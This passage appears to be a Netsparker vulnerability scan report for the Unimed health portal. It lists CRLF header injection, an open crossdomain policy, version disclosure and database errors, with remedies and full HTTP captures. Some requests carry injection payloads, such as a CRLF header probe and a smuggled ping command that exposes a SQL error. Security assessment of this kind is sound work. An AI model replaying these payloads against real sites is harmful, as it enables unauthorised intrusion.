if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") == -1) {
var endereco = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593";
var cd_secao = "null";
if (cd_secao != "null") {
endereco = endereco + "&cd_secao=null";
}
endereco = endereco + "&seguro=sim";
document.location = endereco;
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}

function verCertificado() {
var URL = "https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
var W = "500";
var H = "510";
var S = "no";

var Wpopupsize =(W/2);
var Hpopupsize =(H/2);
var CenterPopUpX = (screen.width/2)-(Wpopupsize);
var CenterPopUpY = (screen.height/2)-(Hpopupsize);
var pos = "left="+CenterPopUpX+",top="+CenterPopUpY;
var desktop = window.open(URL, "preview", "width="+W+",height="+H+",toolbar=no,location=no,status=no,menubar=no,scrollbar s="+S+",resizable=no,"+pos);

// parent.location.href="https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
}


-->
</script>
<div class="loginBox" style="position:absolute; top:0; margin:0; left:0;">
<div class="restrito">Área restrita para colaboradores e cooperados:</div>
<form method="POST" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top">
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="54593" />
<input type="hidden" name="kitsite" value="null" />
Login:
<input type="text" class="textBox" name="ds_login">
Senha:
<input type="password" class="textBox" name="ds_senha">
<a href="javascript:validar()"><img id="botaook" src="/pctr/layout/layout_2005/imgs/button/bt-ok.png" border="0"></a>
</form>
<div class="esqueci"><span style="float: left; margin-left: 110px;"><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49101" target="_top">Cadastre-se aqui</a></span> | <a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49144" target="_top">Esqueci minha senha</a></div>
</div>
</body>
</html>
HTTP Header Injection

HTTP Header Injection

2 TOTAL
MEDIUM
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.

Impact

Depending on the application. An attacker might carry out the following forms of attacks:

Actions to Take

  1. See the remedy for solution.
  2. Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow newline characters in input. Where possible use strict white listing.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.

External References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.7 CWE-93 CAPEC-105 WASC-24
- /pct/comum/redireciona.jsp

/pct/comum/redireciona.jsp

http://www.unimed.com.br/pct/comum/redireciona.jsp?cd_materia=http://example.com/%3f%0D%0Ans:%20nets..

Parameters

Parameter Type Value
cd_materia GET http://example.com/? ns: netsparker056650=vuln

Request

GET /pct/comum/redireciona.jsp?cd_materia=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F6B94AFF3B7F744646891E37E67ECF39.dcpr5033; JSESSIONID=BAC4B3E5278E83C0B14D6D2522B7B269.dcpr5033
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:03:28 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Location: http://www.unimed.com.br/#erro=For input string: "http://example.com/?
ns: netsparker056650=vuln"
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


- /pctr/comum/redireciona.jsp

/pctr/comum/redireciona.jsp

http://www.unimed.com.br/pctr/comum/redireciona.jsp?cd_materia=http://example.com/%3f%0D%0Ans:%20net..

Parameters

Parameter Type Value
cd_materia GET http://example.com/? ns: netsparker056650=vuln

Request

GET /pctr/comum/redireciona.jsp?cd_materia=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: http://www.unimed.com.br/pctr/index.jsp?cd_canal=49146
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=1697ECBA5663164FB1B4D18B61F3B274.dcpr5034; JSESSIONID=9BD6B037D56664E2F3F769AA5F398D2E.dcpr5034; JSESSIONID=92051E70B7415357CF814D35D63E001C.dcpr5034; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:10:11 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Location: http://www.unimed.com.br/#erro=For input string: "http://example.com/?
ns: netsparker056650=vuln"
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


Open Policy Crossdomain.xml Identified

Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.

Impact

Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

Classification

OWASP A6 PCI v2.0-6.5.9 CWE-16 WASC-15
- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://www.unimed.com.br/crossdomain.xml

Policy Rules

Request

GET /crossdomain.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=67AD8B8C6A84DA8FB1B0210276158033.dcpr5034
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:03:14 GMT
Server: Apache/2.2.15 (Red Hat)
Last-Modified: Wed, 26 Aug 2009 18:44:12 GMT
ETag: "120c02f-15d-4720fd6489700"
Accept-Ranges: bytes
Content-Length: 349
Connection: close
Content-Type: text/xml


<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" secure="false" /> <allow-http-request-headers-from domain="*" headers="*" secure="false" /> </cross-domain-policy>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp

/pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp CONFIRMED

http://www.unimed.com.br/pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp?materiaurl=..

Request

GET /pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp?materiaurl=http%3A%2F%2Fwww.unimed.com.br%2Fpct%2Fcomum%2Fredireciona.jsp HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=54576&cd_materia=303041
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F6B94AFF3B7F744646891E37E67ECF39.dcpr5033; JSESSIONID=A8EE0043F78F85287E2B786677508F66.dcpr5033
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:03:34 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 5474
Connection: close
Content-Type: text/html;charset=ISO-8859-1




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-BR">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta http-equiv="Content-Language" content="pt-BR" />

<title>Portal Nacional de Saúde :: Unimed do Brasil</title>
<meta name="description" content="Página de erro do Portal Unimed." />

<meta name="author" content="Dynamix Software Ltda (www.dynamix.com.br)." />
<meta name="copyright" content="Copyright (c) 2004 Dynamix Software Ltda." />

<meta name="robots" content="noindex" />

<link rel="home" href="http://www.unimed.com.br" title="Página inicial do Portal Unimed." />

<script language="JavaScript" src="/portal/comum/scripts/funcoes2.js"></script>

<style type="text/css">
/*texto e opcoes*/
body {
margin: 0;
padding: 0;
font-size: 11px;
font-family: verdana, arial, helvetica, sans-serif;
color: #333;
background-color: transparent;
}
/*elementos*/
h1 {
margin: 0;
padding: 0 0 38px 0;
width: auto;
}
h2 {
margin: 0;
padding: 15px 0 30px 0;
color: #c00;
font-size: 17px;
font-weight: bold;
}
h3 {
margin: 0;
padding: 0;
font-size: 11px;
font-weight: bold;
}
p {
margin: 0 0 0 0;
padding: 0 0 15px 0;
}
p.separador {
margin: 0;
padding: 15px 0 50px 0;
}
a {
color: #930;
background-color: transparent;
font-weight: bold;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}

/*geral*/
#geral {
margin: 0;
padding: 30px 0 10px 27px;
width: 728px;
}

/*formulario*/
form {
margin: 0;
padding: 40px 47px 0 0;
}
form fieldset {
margin: 0;
padding: 0;
border: 0px solid;
}
form label {
margin: 0 0 5px 0;
padding: 0;
display: block;
font-weight: normal;
}
form input.a {
margin: 0;
font-size: 10px;
width: 85px;
background-color: #fff;
}
form input.b {
margin: 0;
font-size: 10px;
width: 85px;
background-color: #ffe;
}
form img {
margin: 0 0 -2px 5px;
padding: 0 0 0 0;
border: 0;
}

/*opcoes*/
#geral div.opcoes {
margin: 0;
padding: 0;
width: 202px;
float: left;
text-align: right;
font-size: 10px;
}
#geral div.opcoes p {
margin: 0;
padding: 0 47px 10px 0;
}
#geral div.opcoes ul {
margin: 0;
padding: 0 47px 0 0;
list-style: none;
}
#geral div.opcoes ul li {
margin: 0;
padding: 0;
}
#geral div.opcoes ul li.separador {
margin: 0;
padding: 0 0 10px 0;
}
/*texto*/
#geral div.texto {
margin: 0;
padding: 0;
width: 430px;
float: right;
}

/*rodape*/
#rodape {
clear: both;
margin: 0 0 0 20px;
padding: 10px 0 0 0;
width: 728px;
border-top: 1px solid #333;
text-align: center;
}
#rodape p {
margin: 0;
padding: 0;
}
</style>

</head>

<body>



<!-- INI GERAL -->
<div id="geral">

<!-- ini opcoes -->
<div class="opcoes">

<!-- ini logo unimed -->
<h1><a href="http://www.unimed.com.br/index.jsp"><img src="/portal/comum/imagens/novoportal/lgunimed_fdbranco.gif" border=0 /></a></h1>
<!-- fim logo unimed -->

<!-- ini links -->
<p>Relação dos links mais comuns no Portal Unimed:</p>

<ul>
<li><a href="http://www.unimed.com.br/">Home do Portal</a></li>
<li><a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=34346">Unimed no Brasil</a></li>
<li><a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=34357">Saúde On-line</a></li>
<li><a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=34347">Unimed mais próxima</a></li>
<li><a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=34356">Guia Médico</a></li>
<li><a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=34348">Fale Conosco</a></li>
<li><a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=34360">Agência Unimed de Notícias</a></li>
<li>ou</li>
<li><a href="javascript:history.back()">volte uma página</a></li>
</ul>
<!-- fim links -->

</div>
<!-- fim opcoes -->


<!-- ini texto -->
<div class="texto">

<h2>Solicitação não executada.</h2>

<p>Desculpe, mas a ação solicitada não pôde ser executada. Aparentemente,
os servidores do Portal Unimed não suportam a funcionalidade requerida
para executar este tipo de solicitação.</p>

<p>Por favor, certifique-se de ter digitado corretamente cada parte do
endereço da página e aguarde alguns instantes para tentar novamente.</p>

<h3>O problema persiste?</h3>
<p>Caso você já tenha tentado novamente, mas continua encontrando esta
página de aviso, você pode enviar um e-mail solicitando a verificação
do problema.</p>

<p>Além do seu nome e e-mail para um eventual contato, descreva a sua
intenção e o respectivo endereço de internet utilizado para isto.</p>

<p>Desta forma, você estará auxiliando nossos técnicos na verificação do
problema e ajudando-nos a oferecer um serviço de qualidade a você e
aos demais usuários e visitantes do Portal Unimed.</p>

<p class="separador">(501 - Not Implemented)</p>

</div>
<!-- fim texto -->


</div>
<!-- FIM GERAL -->



<!-- INI RODAPE -->
<div id="rodape">
<p>Portal Nacional de Saúde - Unimed do Brasil. Copyright &copy; 2001-2005 Portal Unimed. Todos os direitos reservados.</p>
<p>Melhor visualizado em 800x600. Desenvolvido por Dynamix Software Ltda.</p>
</div>
<!-- FIM RODAPE -->



</body>
</html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /pctr/layout/layout_2005/form_login.jsp

/pctr/layout/layout_2005/form_login.jsp CONFIRMED

https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=null&seguro..

Identified Field Name

ds_login

Request

GET /pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=null&seguro=sim HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F6B94AFF3B7F744646891E37E67ECF39.dcpr5033; JSESSIONID=67AD8B8C6A84DA8FB1B0210276158033.dcpr5034
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:03:23 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=589E93B7C70A987E6FD6C14A2CFE79D0.dcpr5033; Path=/pctr; Secure,JSESSIONID=589E93B7C70A987E6FD6C14A2CFE79D0.dcpr5033; Path=/pctr
Content-Length: 3139
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Portal Nacional de Saúde :: Unimed do Brasil</title>
<link href="/pctr/layout/layout_2005/css/topo.css" rel="stylesheet" type="text/css">
</head>
<body style="background-color:transparent;" onload="javascript:setaFoco();">
<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script language="JavaScript" type="text/javascript">
<!--
function validar() {
if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") == -1) {
var endereco = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593";
var cd_secao = "null";
if (cd_secao != "null") {
endereco = endereco + "&cd_secao=null";
}
endereco = endereco + "&seguro=sim";
document.location = endereco;
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}

function verCertificado() {
var URL = "https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
var W = "500";
var H = "510";
var S = "no";

var Wpopupsize =(W/2);
var Hpopupsize =(H/2);
var CenterPopUpX = (screen.width/2)-(Wpopupsize);
var CenterPopUpY = (screen.height/2)-(Hpopupsize);
var pos = "left="+CenterPopUpX+",top="+CenterPopUpY;
var desktop = window.open(URL, "preview", "width="+W+",height="+H+",toolbar=no,location=no,status=no,menubar=no,scrollbar s="+S+",resizable=no,"+pos);

// parent.location.href="https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
}


-->
</script>
<div class="loginBox" style="position:absolute; top:0; margin:0; left:0;">
<div class="restrito">Área restrita para colaboradores e cooperados:</div>
<form method="POST" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top">
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="54593" />
<input type="hidden" name="kitsite" value="null" />
Login:
<input type="text" class="textBox" name="ds_login">
Senha:
<input type="password" class="textBox" name="ds_senha">
<a href="javascript:validar()"><img id="botaook" src="/pctr/layout/layout_2005/imgs/button/bt-ok.png" border="0"></a>
</form>
<div class="esqueci"><span style="float: left; margin-left: 110px;"><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49101" target="_top">Cadastre-se aqui</a></span> | <a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49144" target="_top">Esqueci minha senha</a></div>
</div>
</body>
</html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /portal/

/portal/ CONFIRMED

http://www.unimed.com.br/portal/

Identified Cookie

JSESSIONID

Request

GET /portal/ HTTP/1.1
Referer: http://www.unimed.com.br/portal/comum/scripts/swfobject.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:03:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=7098F503D4C40B2DC71CF926660B98C6.dcpr5034; Path=/
Location: http://www.unimed.com.br/capa/index.jsp
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /portal/

/portal/

http://www.unimed.com.br/portal/

Extracted Version

2.2.15

Request

GET /portal/ HTTP/1.1
Referer: http://www.unimed.com.br/portal/comum/scripts/swfobject.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:03:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=7098F503D4C40B2DC71CF926660B98C6.dcpr5034; Path=/
Location: http://www.unimed.com.br/capa/index.jsp
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


Tomcat Version Disclosure

Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%2..

Extracted Version

5.5.9

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=710CBF37322A9B4A56B96F96CAF25AE3.dcpr5034; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:13:55 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3551
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:1167) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1278) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
Java Servlet Version Disclosure

Java Servlet Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is using Java Servlet. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /portal/

/portal/

http://www.unimed.com.br/portal/

Extracted Version

Servlet 2.4

Request

GET /portal/ HTTP/1.1
Referer: http://www.unimed.com.br/portal/comum/scripts/swfobject.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:03:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=7098F503D4C40B2DC71CF926660B98C6.dcpr5034; Path=/
Location: http://www.unimed.com.br/capa/index.jsp
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

Classification

